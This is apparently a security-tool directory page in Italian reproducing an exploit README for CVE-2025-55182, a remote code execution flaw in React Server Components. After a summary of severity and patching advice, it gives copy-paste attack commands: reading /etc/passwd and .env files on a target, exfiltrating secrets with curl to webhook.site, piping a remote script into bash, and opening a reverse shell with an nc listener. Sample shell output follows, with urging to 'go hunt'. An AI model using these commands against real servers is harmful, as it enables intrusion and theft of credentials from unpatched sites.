Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Blackash-CVE-2025-55182 — CVE-2025-55182 | Kitploit
Strumenti/GitHubGitHub/shen771/blackash-cve-2025-55182
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingCommand and ControlApprendimento e FormazioneRed TeamingStrumento di Accesso Remoto
GitHubshen771/blackash-cve-2025-55182
3039 mesi faNon ancora revisionato

Blackash-CVE-2025-55182

CVE-2025-55182

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2025-55182 — Vulnerabilità Critica del Server React

6930a0395ea4b5bfdd70430a_CVE-2025-55182

🧠 Cos'è

  • ⚛️ Una falla di sicurezza critica in React Server Components (RSC)
  • 🧨 Causata da deserializzazione non sicura
  • 🌐 Sfruttabile tramite richieste di rete
  • 🔓 Nessuna autenticazione richiesta
  • ☠️ Può portare a Esecuzione di codice remoto (RCE)

✅ Ciò significa che gli attaccanti potrebbero potenzialmente eseguire codice lato server arbitrario con una singola richiesta costruita ad arte.


📊 Gravità

  • 🔴 Punteggio CVSS: 10.0 (Critico)
  • 🏴‍☠️ Complessità dell'attacco: Bassa
  • 🔑 Privilegi richiesti: Nessuno
  • 👤 Interazione utente: Nessuna
  • 💥 Impatto: Possibile compromissione totale del sistema

📦 Tecnologie Colpite

⚠️ Sistemi che utilizzano React Server Components, inclusi:

  • ✅ Pacchetti DOM del server React

  • ✅ Framework che includono RSC, come:

    • Next.js (App Router + RSC)
Scarica lo strumento
  • Plugin Vite RSC
  • Strumenti Parcel RSC
  • Redwood, Waku, ecc.
  • ❌ Non colpiti:

    • App React puramente lato client
    • App che NON utilizzano Server Components

    🔥 Perché è Pericoloso

    • 🧑‍💻 Gli attaccanti possono eseguire comandi sul tuo server
    • 🗃️ Potenziale per rubare database e segreti
    • 🦠 Può essere usato per distribuire ransomware o backdoor
    • 🔄 Può consentire movimento laterale nell'infrastruttura
    • 🚀 Sfruttabile su larga scala

    🛠️ Cosa Fare Immediatamente

    ✅ 1. Patch e Aggiornamento

    • ⬆️ Aggiorna React alle versioni corrette
    • ⬆️ Aggiorna Next.js o qualsiasi framework basato su RSC

    ✅ 2. Audit delle Dipendenze

    • 🔍 Scansiona per pacchetti vulnerabili transitivi

    • 🧾 Usa:

      • npm audit
      • pnpm audit
      • yarn audit

    ✅ 3. Schermatura Temporanea (Non una Soluzione Completa)

    • 🛡️ Regole WAF
    • 🔐 Filtri di validazione delle richieste
    • 🚫 Blocca payload sospetti

    ⚠️ Questi riducono solo il rischio — NON sostituiscono la correzione


    👥 Chi Dovrebbe Preoccuparsi?

    • ✅ Sviluppatori full-stack che usano Next.js App Router

    • ✅ Team DevOps che ospitano app React SSR

    • ✅ Ingegneri della sicurezza che monitorano:

      • Servizi web Node.js
      • Runtime Edge
      • App SSR serverless

    📌 Punto Chiave

    🚨 Se la tua app utilizza React Server Components e non è corretta — è potenzialmente completamente compromessa in questo momento.


    🚨 Ecco tutti i comandi rapidi di cui avrai mai bisogno (copia-incolla → risultato immediato):

    CVE-2025-55182.py (basic RCE)

    root@kitploit:~
    # Basic info
    ./CVE-2025-55182.py https://target.com "id"
    ./CVE-2025-55182.py https://target.com "whoami"
    ./CVE-2025-55182.py https://target.com "uname -a"
    
    # Read files
    ./CVE-2025-55182.py https://target.com "cat /etc/passwd"
    ./CVE-2025-55182.py https://target.com "cat /app/.env"
    
    # Exfiltrate
    ./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"
    
    # Download & run (if wget/curl exists)
    ./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"
    

    CVE-2025-55182-revshell.py (instant reverse shell)

    root@kitploit:~
    # 1. Start listener (once)
    nc -lvnp 4444
    
    # 2. Fire → shell in <3 seconds
    ./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
    

    Letteralmente.
    Due script, questi 8 comandi → compromissione totale su qualsiasi sito Next.js non corretto oggi.
    Vai a prenderti quelle taglie.

    Ecco esattamente cosa vedrai in tempo reale quando l'exploit funziona (target non corretto al 100%, 3 Dicembre 2025):

    1. Quando esegui lo script RCE normale (CVE-2025-55182.py)
    Digiti:

    root@kitploit:~
    ./CVE-2025-55182.py https://target.com "whoami"
    

    Vedi immediatamente sullo schermo:

    root@kitploit:~
    [+] CVE-2025-55182 Exploit
    [+] Target  : https://target.com
    [+] Command : whoami
    [+] Sending payload ...
    [+] Payload delivered successfully!
    [+] HTTP 200 – Command should have executed on the server
    [+] Server response:
    node
    

    → Quel “node” (o qualunque output del comando) è l'output effettivo dal server vittima.
    Se esegui id vedrai le righe complete uid/gid, ecc.

    2. Quando esegui lo script reverse-shell (CVE-2025-55182-revshell.py)
    Digiti:

    root@kitploit:~
    ./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
    

    Vedi immediatamente sul terminale del listener:

    root@kitploit:~
    listening on [any] 4444 ...
    connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
    whoami
    node
    pwd
    /app
    ls -la
    total 1234
    drwxr-xr-x 1 node node  4096 Dec  3 12:34 .
    drwxr-xr-x 1 root root  4096 Nov 30 10:11 ..
    -rw-r--r-- 1 node node   420 Dec  3 11:11 .env
    ...
    

    → Shell TTY interattiva completa come utente node (quasi sempre l'utente dell'app web). Sei in controllo della macchina.

    Letteralmente.
    Se vedi uno dei precedenti → exploit funzionato al 100%.
    Se ricevi solo HTTP 403/404 o nulla → già corretto o bloccato dal WAF.
    Vai a caccia.


    Avviso legale

    Questa PoC è solo per test di sicurezza autorizzati e uso educativo.
    Non eseguirla contro alcun sistema che non possiedi o per cui non hai esplicita autorizzazione scritta per testare.
    L'uso non autorizzato è illegale e può portare a procedimenti penali.
    Usala solo nel tuo laboratorio, in programmi bug-bounty con ambito chiaro, o su target che ti hanno dato il permesso.

    Sei responsabile al 100% delle tue azioni.